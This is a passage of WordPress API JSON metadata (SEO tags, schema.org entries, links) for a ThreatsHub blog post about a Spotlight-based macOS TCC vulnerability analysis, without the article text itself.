Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","og_locale":"en_US","og_type":"article","og_title":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2025-07-28T16:00:00+00:00","og_image":[{"width":432,"height":435,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability","datePublished":"2025-07-28T16:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/"},"wordCount":2087,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp","articleSection":["Microsoft Secure"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","url":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","name":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp","datePublished":"2025-07-28T16:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=59104"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59104\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=59104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=59104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=59104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}